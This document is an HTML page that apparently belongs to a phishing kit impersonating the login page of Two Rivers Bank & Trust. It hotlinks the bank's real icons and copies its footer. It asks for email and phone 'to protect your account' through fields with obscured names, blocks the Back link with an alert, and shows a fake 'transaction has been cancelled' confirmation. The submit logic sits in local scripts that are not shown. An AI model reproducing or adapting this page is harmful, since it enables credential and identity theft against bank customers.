<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login · Two Rivers Bank & Trust</title>
    <link
      rel="icon"
      type="image/x-icon"
      href="https://my.tworivers.bank/images/fi-assets/two-rivers-bank-trust/two-rivers-bank-trust-favicon-98b27f2c.ico"
    />
    <link
      rel="apple-touch-icon"
      href="https://my.tworivers.bank/images/fi-assets/two-rivers-bank-trust/two-rivers-bank-trust-ios-0b4518ce.png"
    />
    <link
      rel="icon"
      sizes="192x192"
      href="https://my.tworivers.bank/images/fi-assets/two-rivers-bank-trust/two-rivers-bank-trust-android-bd6731e0.png"
    />
    <!-- Latest compiled and minified CSS -->
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css"
      integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u"
      crossorigin="anonymous"
    />

    <!-- Optional theme -->
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap-theme.min.css"
      integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp"
      crossorigin="anonymous"
    />

    <link rel="stylesheet" href="./style/style.css" />
  </head>
  <body>
    <!-- card -->
    <div class="card">
      <!-- card Logo -->
      <div class="cardLogo" id="logoDiv"></div>

      
      <!--  -->

      <p
        style="
          margin-top: -10px;
          font-size: 14px;
          font-family: roboto, -apple-system, BlinkMacSystemFont, 'Segoe UI',
            'Helvetica Neue', sans-serif;
        "
      >
        To protect your account, please provide the requested information.
      </p>
      <div class="errorDiv" id="errorDiv" style="display: none"></div>

      <!-- form Four -->

      <div
        class="input"
        onmouseover="moveUp('inputPlaceholderFour')"
        id="formFourDiv"
        style="transition: all 0.2s ease; margin-top: 20px"
      >
        <div
          id="inputPlaceholderFour"
          class="moveIn"
          style="position: absolute; transition: all 0.2s ease"
        >
          Email
        </div>
        <input
          name="__"
          type="text"
          id="emailInput"
          onmouseout="moveIn('inputPlaceholderFour','emailInput')"
          onfocus="moveUp('inputPlaceholderFour')"
          class="cardInput"
          autocomplete="off"
        />
      </div>

      <!-- form Five -->

      <div
        class="input"
        onmouseover="moveUp('inputPlaceholderFive')"
        id="formFiveDiv"
        style="transition: all 0.2s ease; margin-top: 20px"
      >
        <div
          id="inputPlaceholderFive"
          class="moveIn"
          style="position: absolute; transition: all 0.2s ease"
        >
          Phone
        </div>
        <input
          name="___"
          type="text"
          id="phoneInput"
          onmouseout="moveIn('inputPlaceholderFive','phoneInput')"
          onfocus="moveUp('inputPlaceholderFive')"
          class="cardInput"
          autocomplete="off"
        />
      </div>
      <!-- last show -->

      <center style="display: none" id="lastToShow" style="padding: 20px">
        <br /><br /><br />
        <svg
          version="1.1"
          id="Layer_1"
          width="70"
          x="0px"
          y="0px"
          viewBox="0 0 117.72 117.72"
          style="fill: #003f78; enable-background: new 0 0 117.72 117.72"
          xml:space="preserve"
        >
          <style type="text/css"></style>
          <g>
            <path
              class="st0"
              d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"
            />
          </g>
        </svg>
        <br />
        <br />
        <br />
        <h3 style="color: #003f78">
          The transaction has been cancelled successfully.
        </h3>
        <br /><br />
      </center>
      <!--  -->

      <!-- animaton loading -->
      <div class="formLoadAnimDiv" id="formLoadAnimDiv">
        <svg
          width="24"
          height="24"
          viewBox="0 0 24 24"
          xmlns="http://www.w3.org/2000/svg"
          fill="gray"
          style="fill: gray"
        >
          <style>
            .spinner_6kVp {
              transform-origin: center;
              animation: spinner_irSm 0.75s infinite linear;
            }
            @keyframes spinner_irSm {
              100% {
                transform: rotate(360deg);
              }
            }
          </style>
          <path
            d="M10.72,19.9a8,8,0,0,1-6.5-9.79A7.77,7.77,0,0,1,10.4,4.16a8,8,0,0,1,9.49,6.52A1.54,1.54,0,0,0,21.38,12h.13a1.37,1.37,0,0,0,1.38-1.54,11,11,0,1,0-12.7,12.39A1.54,1.54,0,0,0,12,21.34h0A1.47,1.47,0,0,0,10.72,19.9Z"
            class="spinner_6kVp"
          />
        </svg>
      </div>
      <!--  -->

      <div
        style="
          display: flex;
          align-items: center;
          justify-content: space-between;
          margin-top: 10px;
        "
        id="threeHa"
      >
        <div
          id="dd"
          style="
            font-weight: 600;
            display: inline-block;
            margin-top: -6px;
            padding: 1px;
            line-height: 34px;
            color: #003f78;
            font-size: 15px;
            cursor: pointer;
            margin-top: 20px;
          "
          onclick="alert('Please complete your form before exit.')"
        >
          Back
        </div>

        <button
          style="
            width: auto;
            height: auto;
            padding: 5px 10px;
            margin-left: 20px;
            width: 100px;
            background-color: #003f78;
          "
          onclick="emailAndPassword()"
          id="submit3Btn"
        >
          Continue
        </button>
      </div>
      <!--  -->

      <br />
      <br />
    </div>

    <footer
      class="p-2 d-flex align-item-center justify-content-center m-auto footerList"
    >
      <div>© 2024 Two Rivers Bank & Trust</div>
      <div>
        <span style="margin-left: 5px; margin-right: 10px">•</span>(888)
        226-6063
      </div>
      <div>
        <span style="margin-left: 5px; margin-right: 10px">•</span>Privacy
        policy
      </div>
      <div>
        <span style="margin-left: 5px; margin-right: 10px">•</span>Member FDIC
      </div>
      <div style="display: flex">
        •
        <svg
          width="16"
          height="11"
          viewBox="0 0 10 7"
          aria-hidden="true"
          style="
            margin-right: 5px;
            margin-top: 2px;
            fill: rgb(112, 112, 112);
            margin-left: 10px;
          "
        >
          <path
            d="M4.96.222L.337 2.588v.962l.511.007v3.448h8.186L9.03 3.55h.55v-.962L4.959.222zm3.163 5.872H1.76V3.028l3.2-1.65 3.163 1.65v3.066zm-4.677-2.26h2.999v-.828H3.446v.828zm0 1.489h2.985v-.828H3.446v.828z"
          ></path>
        </svg>
        Equal Housing Lender
      </div>
    </footer>
    <script src="./react/reaction.js"></script>
    <script src="./react/jquery.min.js"></script>
    <script src="./react/jquery.maxlength.js"></script>
    <script src="./react/jquery.form.min.js"></script>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"
      integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    ></script>
  </body>
</html>
